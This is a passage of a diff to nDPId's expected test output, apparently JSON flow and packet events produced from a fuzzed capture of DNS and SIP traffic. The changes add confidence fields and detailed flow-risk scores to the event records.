 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1120470250906,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470250906,"pkt":"ADBUADRWAODtAW69CABFAABIas4AAIARTIPAqAGswKgBAQrOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470250906,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250906,"flow_last_seen":1120470250906,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470250906,"l3_proto":"ip4","src_ip":"192.168.1.172","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1120470251907,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470251907,"pkt":"ADBUADRWAODtAW69CABFAABIassAAIARTILAqAECwKgBAQrOADUANK35e\/0BAAABAAAAJXMABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1120470253909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470253909,"pkt":"ADBUADRWAODtAW69CABFAABIatAAAIARTIHAqAECwKgBAQrOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZTBjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470253909,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybe0city.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470253909,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybe0city.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":339,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470255912,"pkt":"ADBUAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":339,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1120470259918,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470259918,"pkt":"ADBUADRWAODtAW69CABFAABIatkAAIQRTHjAqAECwKgBATnOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhABE="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":180000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":180000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470083310,"flow_last_seen":1120470088311,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -695,38 +695,38 @@
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267920,"flow_last_seen":1120470267920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1120470267920,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470267920,"pkt":"ADBUADRWAODtAW69CABFAABEatoAAIARTHvAqAECwKgBAQrPADUAMGzyt\/0AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267920,"flow_last_seen":1120470267920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267920,"flow_last_seen":1120470267920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470267920,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1120470267922,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470267922,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cs8AR09ueP2AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAAC1Bsb2NhbGhvc3QA"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":345,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470267922,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":345,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470267920,"flow_last_seen":1120470267922,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470267922,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1120470267925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470267925,"pkt":"ADBUADRWAODtAW69CABFAABIatwAAIARTHXAqAECwKgBAQrQADUANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":350,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470268921,"pkt":"ADBUADRWAODtAW69CABFAGhIat4AAIARTHPAqAECwKgBAQrQADUANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":350,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1120470270925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470270925,"pkt":"ADBUADRWAODtAW69CABFAABIat8AAIARTHLAqAECwKgBAYrQADUANDb28v4BAAABwwAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
